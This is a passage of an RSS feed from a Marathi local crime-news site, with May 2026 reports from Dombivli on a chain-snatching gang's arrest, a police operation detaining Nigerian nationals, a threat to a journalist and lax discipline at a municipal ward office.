पोलिसांनी चिंतन नंदा (२०), मोहित जाधव (१९) आणि चोरीचा मुद्देमाल विक्रीस मदत करणारा स्वप्नील भोईर (२७) यांना अटक केली. आरोपींकडून लुटलेली २५.२८० ग्रॅम वजनाची सोन्याची चेन तसेच गुन्ह्यात वापरलेल्या दोन मोटारसायकली जप्त करण्यात आल्या आहेत.

या प्रकरणातील सर्वात धक्कादायक बाब म्हणजे या टोळीतील बहुतांश सदस्य हे १६ ते १८ वयोगटातील विधीसंघर्षीत बालक असल्याचे तपासात निष्पन्न झाले आहे. रेकी करणे, लक्ष्य निवडणे आणि मारहाण करून लूट करणे अशा पद्धतीने त्यांनी गुन्ह्याची अंमलबजावणी केल्याचे उघड झाले आहे.

मा. अपर पोलीस आयुक्त संजय जाधव, पोलीस उप आयुक्त अतुल झेंडे आणि सहाय्यक पोलीस आयुक्त सुहास हेमाडे यांच्या मार्गदर्शनाखाली वरिष्ठ पोलीस निरीक्षक राम चोपडे, पोलीस निरीक्षक गहिणीनाथ गमे, सहायक पोलीस निरीक्षक प्रशांत मोरे, सचिन लोखंडे व त्यांच्या पथकाने ही उल्लेखनीय कारवाई केली.

The post “ज्येष्ठ नागरिकावर काठीने हल्ला; चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी केला पर्दाफाश!” first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8810 0
डोंबिवलीत पहाटेची धडक! खोणी-पलाव्यात २४ नायजेरियन ताब्यात https://crimeaala.com/?p=8803&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25a1%25e0%25a5%258b%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b2%25e0%25a5%2580%25e0%25a4%25a4-%25e0%25a4%25aa%25e0%25a4%25b9%25e0%25a4%25be%25e0%25a4%259f%25e0%25a5%2587%25e0%25a4%259a%25e0%25a5%2580-%25e0%25a4%25a7%25e0%25a4%25a1%25e0%25a4%2595-%25e0%25a4%2596%25e0%25a5%258b https://crimeaala.com/?p=8803#respond Sat, 23 May 2026 12:19:52 +0000 https://crimeaala.com/?p=8803 डोंबिवली : मानपाडा पोलीस ठाणे आणि नवी मुंबई पोलीस यांच्या संयुक्त पथकाने शुक्रवारी पहाटे खोणी-पलावा परिसरात मोठे कोंबिंग ऑपरेशन राबवत अवैधरीत्या वास्तव्यास असलेल्या नायजेरियन नागरिकांविरोधात धडक कारवाई केली. या कारवाईत १३ पुरुष, ७ महिला, ३ अल्पवयीन मुले आणि १ अल्पवयीन मुलगी अशा एकूण २४ जणांना ताब्यात घेण्यात आले असून त्यांच्या पासपोर्ट, व्हिसा आणि इतर कायदेशीर [...]

The post डोंबिवलीत पहाटेची धडक! खोणी-पलाव्यात २४ नायजेरियन ताब्यात first appeared on crimeaala.com.

]]>

डोंबिवली : मानपाडा पोलीस ठाणे आणि नवी मुंबई पोलीस यांच्या संयुक्त पथकाने शुक्रवारी पहाटे खोणी-पलावा परिसरात मोठे कोंबिंग ऑपरेशन राबवत अवैधरीत्या वास्तव्यास असलेल्या नायजेरियन नागरिकांविरोधात धडक कारवाई केली. या कारवाईत १३ पुरुष, ७ महिला, ३ अल्पवयीन मुले आणि १ अल्पवयीन मुलगी अशा एकूण २४ जणांना ताब्यात घेण्यात आले असून त्यांच्या पासपोर्ट, व्हिसा आणि इतर कायदेशीर कागदपत्रांची सखोल पडताळणी सुरू करण्यात आली आहे.

मानपाडा पोलीस ठाणे हद्दीत मागील दोन वर्षांत मोठ्या प्रमाणात ड्रग्सविरोधी कारवाया करण्यात आल्या होत्या. त्यानंतर खोणी-पलावा परिसरात काही नायजेरियन नागरिक अवैधपणे राहत असल्याची गोपनीय माहिती पोलिसांना मिळाली होती. त्याचबरोबर नवी मुंबईतील वाशी पोलीस ठाण्याच्या गुन्ह्यातील एका पाहिजे आरोपीचा शोध सुरू असल्याने दोन्ही पोलीस दलांनी संयुक्त मोहीम आखली.

आज सकाळी राबविण्यात आलेल्या या कोंबिंग ऑपरेशनमध्ये संशयित नागरिकांची चौकशी करून त्यांना ताब्यात घेण्यात आले. संबंधितांकडे असलेल्या कागदपत्रांची पडताळणी सुरू असून नियमभंग आढळल्यास कठोर कायदेशीर कारवाई करण्यात येणार असल्याचे पोलिसांनी स्पष्ट केले.

ही कारवाई पोलीस आयुक्त ठाणे आशुतोष डुंबरे, सह पोलीस आयुक्त  ज्ञानेश्वर चव्हाण, अपर पोलीस आयुक्त  संजय जाधव, पोलीस उप आयुक्त परिमंडळ-३ कल्याण  अतुल झेंडे आणि सहाय्यक पोलीस आयुक्त डोंबिवली विभाग  सुहास हेमाडे यांच्या मार्गदर्शनाखाली पार पडली.
या मोहिमेत वरिष्ठ पोलीस निरीक्षक  संदिपान शिंदे यांच्या नेतृत्वाखाली मानपाडा पोलीस ठाण्याचे १२ अधिकारी व ३१ पोलीस अंमलदार तसेच नवी मुंबई पोलीस दलाचे सहाय्यक पोलीस आयुक्त  धर्मपाल बनसोडे व त्यांच्या पथकातील १३ अधिकारी आणि ४० पोलीस अंमलदार सहभागी झाले होते.

The post डोंबिवलीत पहाटेची धडक! खोणी-पलाव्यात २४ नायजेरियन ताब्यात first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8803 0
डोंबिवली पोलीस ठाण्यातच पत्रकाराला धमकी https://crimeaala.com/?p=8793&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25a1%25e0%25a5%258b%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b2%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2%25e0%25a5%2580%25e0%25a4%25b8-%25e0%25a4%25a0%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a4%25e0%25a4%259a https://crimeaala.com/?p=8793#respond Wed, 13 May 2026 08:38:16 +0000 https://crimeaala.com/?p=8793 डोंबिवली : केडीएमसीकडे फेरीवाल्यांविरोधात तक्रार केल्याचा राग मनात धरून एका पत्रकाराला थेट “तुला बघून घेईल, लेडीज काय करू शकते हे दाखवते” अशी धमकी देण्यात आल्याची धक्कादायक घटना डोंबिवली पोलीस ठाणे आवारातच घडली आहे. याप्रकरणी डोंबिवली पोलीस ठाण्यात अदखलपात्र गुन्हा (NCR) दाखल करण्यात आला आहे. मिळालेल्या माहितीनुसार, पत्रकार विनोद प्रेमनारायण गिरी यांनी केडीएमसीकडे फेरीवाल्यांविरोधात तक्रार केली [...]

The post डोंबिवली पोलीस ठाण्यातच पत्रकाराला धमकी first appeared on crimeaala.com.

]]>

डोंबिवली : केडीएमसीकडे फेरीवाल्यांविरोधात तक्रार केल्याचा राग मनात धरून एका पत्रकाराला थेट “तुला बघून घेईल, लेडीज काय करू शकते हे दाखवते” अशी धमकी देण्यात आल्याची धक्कादायक घटना डोंबिवली पोलीस ठाणे आवारातच घडली आहे. याप्रकरणी डोंबिवली पोलीस ठाण्यात अदखलपात्र गुन्हा (NCR) दाखल करण्यात आला आहे.

मिळालेल्या माहितीनुसार, पत्रकार विनोद प्रेमनारायण गिरी यांनी केडीएमसीकडे फेरीवाल्यांविरोधात तक्रार केली होती. याचाच राग मनात धरून छाया अमोल खिल्लारे हिने १२ मे रोजी रात्री सुमारे १० वाजण्याच्या सुमारास डोंबिवली पोलीस ठाणे परिसरात गिरी यांना धमकी दिल्याचा आरोप करण्यात आला आहे.

या प्रकरणी भारतीय न्याय संहिता (BNS) कलम 351(2) अंतर्गत डोंबिवली पोलीस ठाण्यात एनसीआर क्रमांक 1708/2026 दाखल करण्यात आला आहे.
पोलीस ठाण्याच्या आवारातच पत्रकाराला धमकावण्याचा प्रकार घडल्याने कायदा-सुव्यवस्थेवर प्रश्नचिन्ह निर्माण झाले असून, फेरीवाला लॉबी इतकी बेधडक झाली आहे का? असा सवाल आता उपस्थित केला जात आहे.

The post डोंबिवली पोलीस ठाण्यातच पत्रकाराला धमकी first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8793 0
“१०/ई प्रभागात मनपाचे नियम धाब्यावर? कार्यालयात शासकीय शिस्तीचा बोजवारा https://crimeaala.com/?p=8784&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a5%25a7%25e0%25a5%25a6-%25e0%25a4%2588-%25e0%25a4%25aa%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25ad%25e0%25a4%25be%25e0%25a4%2597%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%25ae%25e0%25a4%25a8%25e0%25a4%25aa%25e0%25a4%25be%25e0%25a4%259a%25e0%25a5%2587-%25e0%25a4%25a8%25e0%25a4%25bf%25e0%25a4%25af%25e0%25a4%25ae https://crimeaala.com/?p=8784#respond Tue, 05 May 2026 14:25:17 +0000 https://crimeaala.com/?p=8784 डोंबिवली : कल्याण-डोंबिवली महानगरपालिकेच्या १०/ई प्रभाग कार्यालयातील कारभार पुन्हा एकदा वादाच्या भोवऱ्यात सापडला असून, “या प्रभागात मनपाचे नियम लागू होतात की नाही?” असा संतप्त सवाल नागरिकांकडून उपस्थित केला जात आहे. डोंबिवलीतील रहिवासी मनोज गिरी यांनी गंभीर आरोप करत सांगितले की, याच प्रभागातील कर्मचारी शासकीय वेळेत पत्ते खेळत असल्याची तक्रार यापूर्वी करण्यात आली होती. मात्र त्यावर [...]

The post “१०/ई प्रभागात मनपाचे नियम धाब्यावर? कार्यालयात शासकीय शिस्तीचा बोजवारा first appeared on crimeaala.com.

]]>

डोंबिवली : कल्याण-डोंबिवली महानगरपालिकेच्या १०/ई प्रभाग कार्यालयातील कारभार पुन्हा एकदा वादाच्या भोवऱ्यात सापडला असून, “या प्रभागात मनपाचे नियम लागू होतात की नाही?” असा संतप्त सवाल नागरिकांकडून उपस्थित केला जात आहे.

डोंबिवलीतील रहिवासी मनोज गिरी यांनी गंभीर आरोप करत सांगितले की, याच प्रभागातील कर्मचारी शासकीय वेळेत पत्ते खेळत असल्याची तक्रार यापूर्वी करण्यात आली होती. मात्र त्यावर कारवाई झाल्याचे चित्र दिसत नाही.

आज पुन्हा कामानिमित्त प्रभाग कार्यालयात गेल्यानंतर धक्कादायक प्रकार समोर आला. वार्ड ऑफिसरचा खाजगी वाहन चालक थेट अनधिकृत बांधकाम निवारण कक्षात बसलेला आढळून आला. विशेष म्हणजे या कक्षात महत्त्वाचे शासकीय कागदपत्रे, अर्जदारांची वैयक्तिक माहिती व संवेदनशील नोंदी ठेवण्यात येतात. अशा ठिकाणी खाजगी व्यक्तीचा मुक्त वावर हा सुरक्षा आणि गोपनीयतेचा गंभीर भंग असल्याचा आरोप करण्यात येत आहे.

याशिवाय प्रभागातील बहुतांश कर्मचाऱ्यांच्या गळ्यात ओळखपत्र नसल्याने नेमका कर्मचारी कोण आणि बाहेरील व्यक्ती कोण, हेच ओळखणे कठीण झाले आहे.
या सर्व प्रकारामुळे १०/ई प्रभाग कार्यालयाचा कारभार पूर्णपणे बेफिकीर, बेशिस्त आणि संशयास्पद पद्धतीने चालत असल्याची चर्चा रंगली असून संबंधित अधिकाऱ्यांवर तात्काळ चौकशी करून शासकीय नियमानुसार कठोर कारवाई करावी, अशी मागणी होत आहे.

“मनपाच्या कार्यालयात नियम पायदळी तुडवले जात असतील तर सामान्य नागरिकांनी न्याय कुणाकडे मागायचा?” असा संतप्त प्रश्न नागरिकांनी उपस्थित केला आहे.

The post “१०/ई प्रभागात मनपाचे नियम धाब्यावर? कार्यालयात शासकीय शिस्तीचा बोजवारा first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8784 0